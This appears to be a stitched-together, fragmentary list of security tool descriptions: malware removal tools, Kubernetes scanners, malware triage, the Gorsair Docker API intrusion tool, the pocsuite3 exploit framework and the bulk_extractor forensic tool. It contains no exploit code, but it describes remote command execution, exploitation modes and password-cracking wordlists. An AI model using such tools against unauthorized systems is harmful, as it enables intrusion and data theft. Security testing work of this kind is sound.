helps keep Windows
computers free from prevalent malware. MSRT finds and removes threats
and reverses the changes made by these threats. MSRT is generally
released monthly as part of Windows Update or as a standalone tool
available here for download.
Use this tool:
If you have automatic updates for Windows turned off. Windows Update automatically downloads and runs MSRT in the background.
If you suspect an infection from prevalent malware families
is a scan tool designed to find and remove
malware from Windows computers. Simply download it and run a scan to
find malware and try to reverse changes made by identified threats.
Safety Scanner only scans when manually triggered and is available for
use 10 days after being downloaded. We recommend that you always
download the latest version of this tool before each scan.
is an open-source tool that hunts for security issues in
your Kubernetes clusters. It’s designed to increase awareness and
visibility of the security controls in Kubernetes environments.
kube-hunter is available as a container (aquasec/kube-hunter), and we also offer a web site at kube-hunter.aquasec.com
where you can register online to receive a token allowing you see and
share the results online. You can also run the Python code yourself as
described below.
is a Go application that checks whether Kubernetes is deployed securely by running the checks documented in the CIS Kubernetes Benchmark.
"An objective, consensus-driven security guideline for the Kubernetes Server Software."
Note that it is impossible to inspect the master nodes of managed
clusters, e.g. GKE, EKS and AKS, using kube-bench as one does not have
access to such nodes, although it is still possible to use kube-bench to
check worker node configuration in these environments.
Tests are configured with YAML files, making this tool easy to update as test specifications evolve.
Sample Output:
CIS Kubernetes Benchmark support
kube-bench supports the tests for Kubernetes as defined in the CIS Benchmarks 1.0.0 to 1.4.0 respectively.
CIS Kubernetes Benchmark
kube-bench config
Kubernetes versions
1.0.0
1.6
1.6
1.1.0
1.7
1.7
1.2.0
1.8
1.8-1.10
1.3.0
1.11
1.11-1.12
1.4.0
1.13
1.13-
By default kube-bench will determine the test set to run based on the Kubernetes version running on the machine.
Malware Analysis tools was to developed to provide students with a comprehensive hands-on exposure to the processes, tools and procedures used to identify common types of malware and to quickly determine their capabilities and threat level.
The new 1.6.0 version of MALWOVERVIEW tool is finally available!
Malwoverview.py is a first response tool to perform an initial and quick triage on either a directory containing malware samples, specific malware sample or even a suspect URL.
https://github.com/alexandreborges/malwoverview This version: * It is using the Hybrid Analysis API version 2.4.0. * Includes certificate information in the Hybrid Analysis report. * Includes MITRE information in the Hybrid Analysis report. * Includes an option to download samples from Hybrid Analysis.
is a penetration testing tool for discovering and remotely
accessing Docker APIs from vulnerable Docker containers. Once it has
access to the docker daemon, you can use Gorsair to directly execute
commands on remote containers.
Gorsair hacks its way into remote docker containers that expose their APIs.
Exposing the docker API on the internet is a tremendous risk, as it
can let malicious agents get information on all of the other containers,
images and system, as well as potentially getting privileged access to
the whole system if the image uses the root user.
Install
From a release
Set the:
GORSAIR_VERSION to whatever release you are interested in
OS to your operating system (linux, windows or darwin)
ARCH to your architecture (amd64, arm, or ppc64le)
And then run the following command to install gorsair. curl https://github.com/Ullaakut/Gorsair/releases/download/$GORSAIR_VERSION/gorsair_$OS_$ARCH --output /usr/local/bin/gorsair
From the sources
Make sure that you have a go version that supports modules (versions 1.11 and above)
Make sure that your environment contains the GO111MODULE variable set to on
Run go build -o /usr/local/bin/gorsair cmd/*.go from the root of this repository
Command line options
-t, --targets: Set targets according to the nmap target format. Required. Example: --targets="192.168.1.72,192.168.1.74"
-p, --ports: (Default: 2375,2376) Set custom ports.
-s, --speed: (Default: 4)
Set custom nmap discovery presets to improve speed or accuracy. It's
recommended to lower it if you are attempting to scan an unstable and
slow network, or to increase it if on a very performant and reliable
network. You might also want to keep it low to keep your discovery
stealthy. See this for more info on the nmap timing templates.
is an open-sourced remote vulnerability testing and proof-of-concept development framework developed by the Knownsec 404 Team.
It comes with a powerful proof-of-concept engine, many niche features
for the ultimate penetration testers and security researchers.
Features
PoC scripts can running with `attack`,`verify`, `shell` mode in different way
Plugin ecosystem
Dynamic loading PoC script from any where (local file, redis , database, Seebug ...)
Load multi-target from any where (CIDR, local file, redis , database, Zoomeye ...)
Results can be easily exported
Dynamic patch and hook requests
Both command line tool and python package import to use
IPV6 support
Global HTTP/HTTPS/SOCKS proxy support
Simple spider API for PoC script to use
Integrate with [Seebug](https://www.seebug.org) (for load PoC from Seebug website)
Integrate with [ZoomEye](https://www.zoomeye.org) (for load target from ZoomEye `Dork`)
Integrate with [Ceye](http://ceye.io/) (for verify blind DNS and HTTP request)
More ...
Functions
Vulnerability Testing Framework
Written in Python and supported both validation and exploitation two
plugin-invoked modes, Pocsuite could import batch targets from files and
test those targets against multiple exploit-plugins in advance.(See "Pocsuite usage")
PoC/Exp Development Kit
Like Metasploit, it is a development kit for pentesters to develope
their own exploits. Based on Pocsuite, you can write the most core code
of PoC/Exp without caring about the resulting output etc. There are at
least several hundred people writing PoC/Exp based on Pocsuite up to
date.
Integratable Module
Users could utilize some auxiliary modules packaged in Pocsuite to
extend their exploit functions or integrate Pocsuite to develop other
vulnerability assesment tools.
Integrated ZoomEye And Seebug APIs
Pocsuite is also an extremely useful tool to integrate Seebug and
ZoomEye APIs in a collaborative way. Vulnerablity assessment can be done
automatically and effectively by searching targets through ZoomEye and
acquiring PoC scripts from Seebug or locally.
Installation
pocsuite3 works out of the box with Python version 3.x on any platform.
You can use Git to clone the latest source code repository
$ git clone git@github.com:knownsec/pocsuite3.git
Or click here to download the latest source zip package, and extract
is to locate potentially
sensitive information such as email addresses and credit card numbers,
as well as other types of information such as GPS coordinates and image
file types.
Bulk extractor ignores the file system and scans it linearly.
This, in combination with parallel processing, makes the tool very fast.
It will have an issue with fragmented files, but typically, files
aren’t fragmented.
bulk_extractor can be used on Windows, Linux, and Macintosh OS X platforms.
This page contains instructions for downloading, building and
installing bulk_extractor on Linux and OS X, and for downloading and
installing the bulk_extractor binary on Windows. If you would like to
build your own Windows binary
bulk_extractor is a C++ program that scans a disk image, a
file, or a directory of files and extracts useful information without
parsing the file system or file system structures. The results are
stored in feature files that can be easily inspected, parsed, or
processed with automated tools. bulk_extractor also creates histograms of features that it finds, as features that are more common tend to be more important.
We have made the following tools available for processing feature files generated by bulk_extractor:
A a small number of python programs that perform automated processing on feature files.
A Bulk Extractor Viewer User Interface (BEViewer) for browsing features stored in feature files and for launching bulk_extractor scans. Please see page BEViewer.
Installation Steps for Windows / Linux :
Output Feature Files
bulk_extractor now creates an output directory that has the following layout:
alerts.txt
Processing errors.
ccn.txt
Credit card numbers
ccn_track2.txt
Credit card “track 2″ informaiton, which has previously been found in some bank card fraud cases.
domain.txt
Internet domains found on the drive, including dotted-quad addresses found in text.
email.txt
Email addresses.
ether.txt
Ethernet MAC addresses found through IP packet carving of swap files and compressed system hibernation files and file fragments.
exif.txt
EXIFs from JPEGs and video segments. This feature file contains all of the EXIF fields, expanded as XML records.
find.txt
The results of specific regular expression search requests.
identified_blocks.txt
Block hash values that match hash values in a hash database that the scan was run against.
ip.txt
IP addresses found through IP packet carving.
rfc822.txt
Email message headers including Date:, Subject: and Message-ID: fields.
tcp.txt
TCP flow information found through IP packet carving.
telephone.txt
US and international telephone numbers.
url.txt
URLs, typically found in browser caches, email messages, and pre-compiled into executables.
url_searches.txt
A histogram of terms used in Internet searches from services such as Google, Bing, Yahoo, and others.
url_services.txt
A histogram of the domain name portion of all the URLs found on the media.
wordlist.txt
A list of all “words” extracted from the disk, useful for password cracking.
wordlist_*.txt
The wordlist with duplicates removed, formatted in a form that can be easily imported into a popular password-cracking program.
zip.txt
A file containing information regarding every ZIP file component found
on the media. This is exceptionally useful as ZIP files contain internal
structure and ZIP is increasingly the compound file format of choice
for a variety of products such as Microsoft Office